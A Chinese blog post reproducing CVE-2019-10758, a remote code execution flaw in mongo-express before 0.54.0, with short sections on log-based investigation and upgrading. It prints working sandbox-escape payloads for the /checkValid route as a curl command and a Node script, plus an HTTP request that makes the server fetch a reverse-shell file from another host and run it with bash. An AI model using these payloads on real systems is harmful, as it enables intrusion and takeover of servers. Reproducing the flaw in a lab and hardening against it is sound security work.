Mongo-Express RCE(CVE-2019-10758)复现排查

于 2023-08-14 16:18:41 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 渗透 应急响应 文章标签: express web安全 安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youuzi/article/details/132278526
版权

目录

概述

影响版本

漏洞复现

应急排查

加固建议

参考链接

概述

Mongo-express是MongoDB数据库管理工具,类似Navicat对应Mysql的关系,其使用Node.js,Express和Bootstrap3编写的基于Web的MongoDB图形化管理界面。

漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid 从外部接收输入,并调用了存在 RCE 漏洞的代码,由此存在被攻击的风险。

影响版本

mongo-express < 0.54.0

漏洞复现

1、攻击链

1. 路由 /checkValid 可以接收用户的输入,并将其作为参数调用存在漏洞的 bson.toBSON 函数
2. bson.toBSON 使用了不安全的 vm 模块来执行用户输入的代码
3. 恶意代码在执行时成功沙盒逃逸,任意代码执行

2、利用代码

(1)curl exploit

curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")'

(2)script exploit

node main.js
exploit = "this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')"
 
var bson = require('mongo-express/lib/bson')
bson.toBSON(exploit)

3、反弹shell

通过wget方式远程下载反弹shell文件

 
 
POST /checkValid HTTP/1.1
 Host: 192.168.52.131:8081
 Content-Length: 203
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://192.168.52.131:8081
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 Referer: http://192.168.52.131:8081/checkVali
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9
 Cookie: experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqVTBaVGd3WlRCbExXTXdaV0l0TkRJeFpTMDVPRFl3TFRRMFpqZ3hObVF4WmpkbU1pST0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D--f48c6e729d1a83e5acdd4acbdabdbd041b684e84; mongo-express=s%3A7Un_UuJXrhL8iEZ6xTpTqX5YPsi9U8is.ROmPXg%2Bo2C9hxhYkylb%2BHkptCE2WKpwdcdD9gMdCNTE
 Connection: close

 document=this.constructor.constructor%28%22return+process%22%29%28%29.mainModule.require%28%22child_process%22%29.execSync%28%22wget+http%3A%2F%2F192.168.52.133%3A8000%2Fshell.txt+-O+%2Ftmp%2Fshell%22%29
 

 

 

 

 执行下载到本地的shell文件
 

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("bash /tmp/shell")

 

 

 

 

 

 
 

应急排查
 

1、通过docker logs排查
 

命令 ”dokcer logs -f 容器ID“,可以在次日志中搜索”checkValid“关键字
 

 

 

 
 

2、mongodb-express自身访问日志
 

morgan是express默认的日志中间件,也可以脱离express,作为node.js的日志组件单独使用。
 

但在此容器环境中,morgan模块是默认没有配置的,故不能通过mongodb-express本身的日志排查
 

 
 

 

 
 

 
 

加固建议
 

升级到mongo-express 0.54.0或更高版本
 

https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2
 

参考链接
 

cve-2019-10758 mongo-express rce 漏洞分析 - 灰信网(软件开发博客聚合)
 

cve-2019-10758 mongo-express rce 漏洞分析_whatday的博客-CSDN博客
 

 

 

                

        

        

    

  


    

      

        

            

              
                
                  dayouziei
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
【云原生之Docker实战】使用Docker部署MongoDB数据库管理工具Mongo-Express

				
			

			

				

					jks212454的博客
				

				

					10-29
					
					1937
					
				

			

		

		

			
				
【云原生之Docker实战】使用Docker部署MongDB数据库管理工具Mongo-Express

			
		

	



                

              
                



	

		

			

				
					
mongo-express 远程代码执行漏洞(CVE-2019-10758

				
			

			

				

					玄道的网安博客
				

				

					06-20
					
					1638
					
				

			

		

		

			
				
前言

mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。

影响版本

mongo-express, 0.54.0 之前的版本

环境搭建

cd vulhub/mongo-express/CVE-2019-10758

docker-compose up -d

环境启动后,访问http://your-ip:8081即可查看到Web页面

			
		

	



                


  
              

                


	

		

			

				
					
CVE-2019-10758mongo-express 远程代码执行漏洞复现

				
			

			

				

					Beret-81的博客
				

				

					06-18
					
					692
					
				

			

		

		

			
				
mongo-express 远程代码执行漏洞漏洞描述漏洞环境漏洞复现
漏洞描述
mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。
漏洞环境
环境搭建:https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758
执行如下命令启动一个0.53.0版本的mo

			
		

	





	

		

			

				
					
mongo-express 远程代码执行漏洞 CVE-2019-10758 漏洞复现

				
			

			

				

					ADummy的博客
				

				

					03-04
					
					530
					
				

			

		

		

			
				
mongo-express 远程代码执行漏洞(CVE-2019-10758)
by ADummy
0x00利用路线
​			Burpsuite发包—>命令执行
0x01漏洞介绍
​		mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。
0x 02漏洞复现




...

			
		

	



		

			
		



	

		

			

				
					
mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget,反弹shell)

				
			

			

				

					negnegil的博客
				

				

					09-07
					
					4085
					
				

			

		

		

			
				
mongo-express
mongo-express是一个MongoDB的Admin Web管理界面,基于NodeJS、Express、Bootstrap3开源编写
漏洞介绍
在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码
复现环境
mongo-express 0.53.0 
MongoDB Version 3.4.24

漏洞环境搭建
采用github开源docker漏洞环境搭建而成
项目地址:
https:/

			
		

	





	

		

			

				
					
mongo-express-mongodb-k8s:Kubernetes配置文件,用于部署与mongodb容器通信的mongo-express容器

				
			

			

				

					03-25
				

			

		

		

			
				
MongoDB是目前非常流行的一款开源、高性能、无模式的文档型数据库,而Mongo-Express则是一个基于WebMongoDB管理界面,它使得管理和操作MongoDB数据库变得更加直观和方便。在Kubernetes(K8s)这样的容器编排系统中...

			
		

	





	

		

			

				
					
mongo-express 远程代码执行漏洞复现

				
			

			

				

					Tauil的博客
				

				

					07-30
					
					1138
					
				

			

		

		

			
				
方法没有进行检验,导致在知晓用户密码情况下可以执行js代码。js文件中定义了该页面访问路径在。同时数据包需要新增类型。打开靶场vulhub。登录网页,发送数据包。

			
		

	





	

		

			

				
					
mongo-mongo-express-k8s:一个用于MongoDB和Mongo Express的Kubernetes配置项目

				
			

			

				

					02-15
				

			

		

		

			
				
Kubernetes上的Mongo  这是一个Kubernetes配置项目,用于部署和运行MongoDB和... 配置为Opaque类型的Mongo秘密配置文件,其中包含mongo-root-username和mongo-root-password  kubectl apply -f deploy/mongo/secrets.y

			
		

	





	

		

			

				
					
Node.js-mongo-express-基于WebMongoDB管理界面采用Node.js和express开发

				
			

			

				

					08-10
				

			

		

		

			
				
标题中的“Node.js-mongo-express-基于WebMongoDB管理界面采用Node.js和express开发”揭示了我们讨论的主题:一个使用Node.js和Express框架构建的MongoDB Web管理界面,名为“mongo-express”。这个工具提供了图形...

			
		

	





	

		

			

				
					
CVE-2019-10758

				
			

			

				

					03-08
				

			

		

		

			
				
CVE-2019-10758 PoC
设置
docker run -p 27017:27017 -d mongo
npm install mongo-express@0.53.0 
cd node_modules/mongo-express/ && node app.js
cURL利用
curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")'
脚本

			
		

	





	

		

			

				
					
mongoose-morgan:一个npm包,用于在MongoDB中保存摩根日志

				
			

			

				

					02-03
				

			

		

		

			
				
猫鼬摩根
 npm软件包,通过添加其他功能将摩根数据记录到MongoDB数据库中来组合和软件包。
安装
要安装此软件包,只需运行:
 npm install mongoose-morgan 
基本用法示例
这是将mongoose-morgan与express应用程序一起使用的示例:
 // express
var express = require('express');
var app = express();
// mongoose-morgan
var morgan = require('mongoose-morgan');
// connection-data
var port = process.env.port || 8080;
// Logger
app.use(morgan({
    connectionString: 'mongodb://localhost:27017/logs-db'
}));
// run
app.listen(port);
console.log('works... ' + port);
上面的示例将在logs-db数据库内部创建名为logs

			
		

	





	

		

			

				
					
mongo-express 代码执行 (cve-2019-10758

				
			

			

				

					weixin_48817799的博客
				

				

					12-30
					
					1260
					
				

			

		

		

			
				
文章目录前言一、复现过程总结

前言
 名称: mongo-express 代码执行 (cve-2019-10758)
描述: mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 

提示:以下是本篇文章正文内容,下面案例可供参考
一、复现过程
1.老样子,fofa靶场http://vulfocus.fofa.so
信息提示如下
2.页面.

			
		

	





	

		

			

				
					
mongo-express 代码执行 (cve-2019-10758)

				
			

			

				

					qq_51459600的博客
				

				

					12-24
					
					830
					
				

			

		

		

			
				
1.环境搭建
项目地址:
vulhub/mongo-express/CVE-2019-10758 at master · vulhub/vulhub (github.com)
拉取项目:
git clone https://github.com.cnpmjs.org/vulhub/vulhub.git

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m0qN0Cum-1640341732202)(https://cdn.jsdelivr.net/gh/QJLONG/HUMME

			
		

	





	

		

			

				
					
cve-2019-10758 mongo-express rce 漏洞分析

				
			

			

				

					whatday的专栏
				

				

					06-14
					
					1481
					
				

			

		

		

			
				
下面是对漏洞的描述:


mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses thetoBSONmethod. A misuse of thevmdependency to performexeccommands in a non-safe environment.


环境搭建

漏洞复现需要准备的环境有:

MongoDB
	node & npm
	mon...

			
		

	





	

		

			

				
					
Vulhub Mongo-Express 远程代码执行漏洞复现

					
最新发布

				
			

			

				

					weixin_53696027的博客
				

				

					06-06
					
					418
					
				

			

		

		

			
				
关于Mongo-Express 远程代码执行漏洞复现

			
		

	





	

		

			

				
					
mongodb – SSJI to RCE

				
			

			

				

					cnbird's blog
				

				

					03-27
					
					1169
					
				

			

		

		

			
				
Lucky discovery
Trying some server side javascript injection in mongodb, I wondered if it would be possible to pop a shell.
The 
run method seems good for this :
> run("uname","-a")
Sun Mar 24 07:

			
		

	





	

		

			

				
					
CVE-2022-48282 MongoDB .NET/C# 驱动存在反序列化漏洞

				
			

			

				

					murphysec的博客
				

				

					02-23
					
					691
					
				

			

		

		

			
				
MongoDB .NET/C# 驱动用于将 .NET 应用程序连接到 MongoDB 集群并建立通信,并使用 _t 字段鉴别属性名称。

MongoDB .NET/C# 驱动 2.19.0 之前版本存在反序列化漏洞,对于用 C# 编写的应用程序,攻击者满足以下条件时可利用此漏洞远程执行任意代码,并造成拒绝服务:

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值